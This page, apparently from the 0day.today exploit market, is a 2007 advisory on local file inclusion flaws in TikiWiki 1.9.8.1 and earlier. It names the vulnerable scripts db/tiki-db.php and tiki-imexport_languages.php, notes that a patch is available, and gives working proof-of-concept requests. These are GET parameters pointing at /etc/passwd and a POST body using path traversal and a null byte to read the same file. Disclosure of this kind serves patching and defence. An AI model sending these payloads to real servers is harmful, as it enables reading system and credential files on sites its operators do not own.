[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

TikiWiki <= 1.9.8.1 Local File Inclusion Vulnerabilities

Author
L4teral
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2247
Category
web applications
Date add
24-10-2007
Platform
unsorted
========================================================
TikiWiki <= 1.9.8.1 Local File Inclusion Vulnerabilities
========================================================


======================================================================
TikiWiki <= 1.9.8.1 Local File Inclusion
======================================================================

Impact:          Local File Inclusion
Status:          patch available


------------------------------
Affected software description:
------------------------------

Application:     TikiWiki
Version:         <= 1.9.8.1
Vendor:          http://tikiwiki.org

Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.


--------------
Vulnerability:
--------------

1.
The script db/tiki-db.php is vulnerable to local file inclusion attacks.

2.
The script tiki-imexport_languages.php is vulnerable to local file inclusion attacks.


------------
PoC/Exploit:
------------

1.
register_globals required:
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd

2.
feature lang_use_db(use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import




#  0day.today [2024-11-14]  #